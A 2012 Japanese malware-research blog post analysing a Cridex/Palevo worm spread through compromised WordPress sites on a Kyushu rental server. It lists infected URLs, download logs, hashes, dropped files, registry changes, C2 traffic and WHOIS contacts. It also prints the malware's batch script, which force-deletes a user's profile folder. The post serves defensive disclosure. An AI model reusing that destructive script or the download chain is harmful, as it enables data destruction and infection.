日曜日, 5月 13, 2012

#OCJP-049: Wordpress脆弱性がある日本国内(九州)レンタルサーバにWorm/Cridex感染ファイル発見! 【対応最中】


今回はWormの感染の事件です。Exploit Pack(種類:Blackhole)から日本国内サーバに感染ファイル(infector HTML JavaScript)がインジェクトされました。それで感染URLが出来上がり、海外UPSスパムに乗せていたと確認しました。そのURLをクリックすると下記の写真ようにマルウェア軍団がパソコンに出来上がります↓

本件の行動分析調査は1日間、バイナリー調査数時間、FORENSICS調査もまた別途半日がかかりました。なお、テスト環境を戻すようにはリセットしか方法な無かったので、非常に危険さが高いマルウェアだと思われます。
感染の原因はまたWordPressの脆弱性経由だと思われます。
さて、下記は詳細情報です↓

■感染されたサーバ/IP↓

ipl2009.net / 218.219.133.2

■感染されたURLとダウンロード証拠↓

--06:42:02-- hxxp://ipl2009.net/wp-includes/usp.html => `usp.html' Resolving ipl2009.net... 218.219.133.2 Connecting to ipl2009.net|218.219.133.2|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 3,231 (3.2K) [text/html] 100%[====================================>] 3,231 --.--K/s 06:42:03 (94.27 MB/s) - `usp.html' saved [3231/3231]

■ファイルの形と中身について↓

見た目は普通のHTMLファイルです↓ 3231 May 11 02:44 usp.html (サイズ) (日付け) (ファイル名) 中身は↓

■マルウェア調査

1)Infector: usp.html ↑マルウェアのJavascriptが下記のスナップショット↓ ↑特にそのままでSpiderMonkeyで実行したら解けるので、解けた時にのコード↓ 実行されたら(危険!)下記のようにブラウザが見えます↓ このファイルのウイルススキャン結果↓ MD5: e55918a185c78c93f89843bc78e4e0f3 File size: 3.2 KB ( 3231 bytes ) File name: usp.html File type: HTML Detection ratio: 7 / 42 Analysis date: 2012-05-12 22:03:59 UTC Result: [CLICK]

2)ダウンローダー: wpbt0.dll.exe

上記のscriptで解けた結果にあるURLに行くと↓ --06:46:34-- hxxp://pe-canada.com/main.php?page=e5c375f8c497a582 => `main.php@page=e5c375f8c497a582' Resolving pe-canada.com... 37.59.68.23 Connecting to pe-canada.com|37.59.68.23|:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 18,784 33.14K/s 06:46:36 (33.09 KB/s) - `main.php@page=e5c375f8c497a582' saved [18784] このファイルの中身はまたすごいコードが入っています↓ 実行されたら見た目は下記のように↓ しかし、実はhtmlだけではなくて、下記のshellcodeも実行されますので、 外からマルウェアがダウンロードされます↓ ↑このHTMLはマルウェアのダウンローダーファイルです、スキャンしたら下記の結果になります↓ MD5: 69cb029f4b244e2bdb94cb4196e60577 File size: 18.3 KB ( 18784 bytes ) File name: main.php@page=e5c375f8c497a582 File type: HTML Detection ratio: 21 / 42 Analysis date: 2012-05-11 20:57:25 UTC Result [CLICK]

3)ダウンロードされたマルウェアに付いて

最終的にはパソコンに下記のマルウェアファイルがダウンロードされています↓ ウイルススキャンしたら、下記の結果となります↓ MD5: 09c2e6b42f7a7372bca7f36881b64d8c File size: 134.1 KB ( 137296 bytes ) File name: "xxxx.exe" File type: Win32 EXE Detection ratio: 21 / 42 Analysis date: 2012-05-13 12:27:34 UTC Result: [CLICK] マルウェア名↓ F-Secure : Trojan.Generic.KD.622010 NOD32 : Win32/AutoRun.Spy.Banker.M Microsoft : Worm:Win32/Cridex.B VIPRE : Trojan.Win32.Generic.pak!cobra Norman : W32/Troj_Generic.BTBWD DrWeb : Trojan.Inject1.3068 TrendMicro-House: TROJ_CLEAMAN.JDR Avast : Win32:Malware-gen nProtect : Trojan.Generic.KD.622010 GData : Trojan.Generic.KD.622010 Kaspersky : P2P-Worm.Win32.Palevo.errt BitDefender : Trojan.Generic.KD.622010 Emsisoft : P2P-Worm.Win32.Palevo!IK McAfee : PWS-Zbot.gen.zh Ikarus : P2P-Worm.Win32.Palevo TrendMicro : TROJ_CLEAMAN.JDR AhnLab-V3 : Worm/Win32.Palevo AVG : PSW.Generic9.CGJU Sophos : Mal/Cleaman-B ViRobot : Worm.Win32.P2P-Palevo.137296 Comodo : TrojWare.Win32.Trojan.Agent.Gen

■マルウェア種類↓

アファイル  :「○○.exe」 マルウェア種類: トロイドロッパー、ワーム、PE/Win32マルウェア マルウェア名 : CRIDEX 又は Palevo マルウェア機能: 感染されたパソコンがロックされてしまう状況、セーフモードの機動が不可能
このマルウェアの調査結果は下記となります(分析迄書く時間が無くてごめんなさい) 1. 下記のマルウェアファイルを保存されます↓
C:\..\%AppData%\KB00420563.exe 09c2e6b42f7a7372bca7f36881b64d8c 137,296bytes ↑payload! C:\..\%Temp%\POS2.tmp.BAT 80fdd61cc6e90ba6dd8e341e5258e09e 177bytes ↑マルウェアSCRIPT C:\..\%Temp%\Perflib_***.dat ce338fe6899778aacfc28414f2d9498b 16,384bytes        ↑(目的は不明) C:\..\%Temp%\~DF2371.tmp 3974098c2ded7c29aef76b5a80d5dd89 180,224         ↑バイナリーデータ C:\..\%Temp%\~DF4206.tmp 3974098c2ded7c29aef76b5a80d5dd89 180,224 C:\..\%Temp%\~DF7F80.tmp 3974098c2ded7c29aef76b5a80d5dd89 180,224 C:\..\%Temp%\~DFAC92.tmp 3974098c2ded7c29aef76b5a80d5dd89 180,224

2. 下記のレジストリーバリューを追加されます↓

HKCU\..\Run: [KB00420563.exe] "C:\Documents and Settings\owner\Application Data\KB00420563.exe" HKCU\Software\Microsoft\Windows Media Center\FBDC89D4(ランダム)

3. 下記のCMDコマンドが出ます↓

%Sytem%\CMD.EXE /C %TEMP%\POS2.tmp.BAT

4. POS2.tmp.BATのコードがマルウェア動きのコードです↓

@echo off :R del /F /Q /A "C:\Documents and Settings\owner\" if exist "C:\Documents and Settings\owner\" goto R del /F /Q /A "C:\DOCUME~1\owner\LOCALS~1\Temp\POS2.tmp.BAT"

5. 調査のスクリーンショット↓

マルウェアファイルが実行された時↓ マルウェアファイルが削除されて、新しいファイルが保存されて、自動で実行された↓ そして自動実行マルウェアがdwwin.exeを実行してexplorer.exeがダウンさせます↓ 新しいexplorer.exeが立ち上がって、マルウェアのCMD.EXEも立ち上がります↓ マルウェアのCMDコマンドラインを確認した時↓

ネットワーク調査結果↓

1. 下記のリモートサーバに接続依頼が投げてます↓ DNSとHTTPでincompletesecuritysubmissions.ruへ接続依頼を投げたと確認しました。 2. シミュレーションしたら443ポートで暗号化されたトラフィック送信を発見しました↓   00000000 | 804C 0103 0000 3300 0000 1000 0004 0000 | .L....3.........   00000010 | 0500 000A 0100 8007 00C0 0300 8000 0009 | ................   00000020 | 0600 4000 0064 0000 6200 0003 0000 0602 | ..@..d..b.......   00000030 | 0080 0400 8000 0013 0000 1200 0063 EDDB | .............c..   00000040 | 3AF4 C388 79A9 F727 A297 1B7C 20E0 | :...y..'...| .     ※)↑恐らくincompletesecuritysubmissions.ruへ送信する目的です。   ※)incompletesecuritysubmissions.ru既にダウンされた状況です。

■リファレンス↓

■感染されたサーバのネットワーク情報↓

ドメイン登録情報はお名前.COM↓ Domain Name: ipl2009.net Created On: 2011-07-12 08:09:37.0 Last Updated On: 2012-04-06 11:20:44.0 Expiration Date: 2013-07-12 08:09:37.0 Status: ACTIVE Registrant Name: Whois Privacy Protection Service by onamae.com Registrant Organization: Whois Privacy Protection Service by onamae.com Registrant Street1: 26-1 Sakuragaoka-cho Registrant Street2: Cerulean Tower 11F Registrant City: Shibuya-ku Registrant State: 13 Registrant Postal Code: 150-8512 Registrant Country: JP Registrant Phone: 03-0364-8727

IP/ネットワーク登録情報↓

a. [Network Number] 218.219.133.0/29 b. [Network Name] 123SERVER g. [Organization] 123server m. [Administrative Contact] KM17473JP n. [Technical Contact] NS7235JP [Assigned Date] 2011/03/01 [Last Update] 2011/03/01 15:41:03(JST) a. [JPNICハンドル] KM17473JP b. [氏名] 川副 政人 c. [Last, First] Masato, Kawazoe d. [電子メイル] mkawazoe@fsi.co.jp f. [組織名] 123サーバー g. [Organization] 123server k. [部署] 九州DCディビジョン l. [Division] Kyushu Data Center Division a. [JPNICハンドル] NS7235JP b. [氏名] 曽根崎 直人 c. [Last, First] Sonezaki, Naoto d. [電子メイル] nsoneza@fsi.co.jp f. [組織名] 富士ソフト株式会社 g. [Organization] FUJISOFT INCORPORATED k. [部署] 九州DCディビジョン l. [Division] Kyushu Data Center Division Less Specific Info. ---------- Kyushu Telecommunication Network Co., Inc. [Allocation] 218.219.128.0/21 Kyushu Telecommunication Network Co., Inc. SUBA-249-A85 [Sub Allocation] 218.219.133.0/24 グラフ↓

【注意点】

感染されたサーバに同じIPでその他34ドメインが存在していますので、 もし、その他のドメインに同じwordpressの脆弱性があったら感染が増える可能性が出ます。
---
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック


TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.

1 件のコメント:

  1. 【追加感染を発見】【注意】
    同じ環境で感染が増えてきました、新規発見した感染URLは↓

    chinalvquan.com/wp-includes/usp.html

    --17:41:27-- hxxp://chinalvquan.com/wp-includes/usp.html
    => `usp.html'
    Resolving chinalvquan.com... 218.219.133.2
    Connecting to chinalvquan.com|218.219.133.2|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 3,231 (3.2K) [text/html]
    100%[====================================>] 3,231 --.--K/s
    17:41:27 (106.06 MB/s) - `usp.html' saved [3231/3231]

    ↑同じVPSで同じWPサービスで同じ脆弱性

    返信削除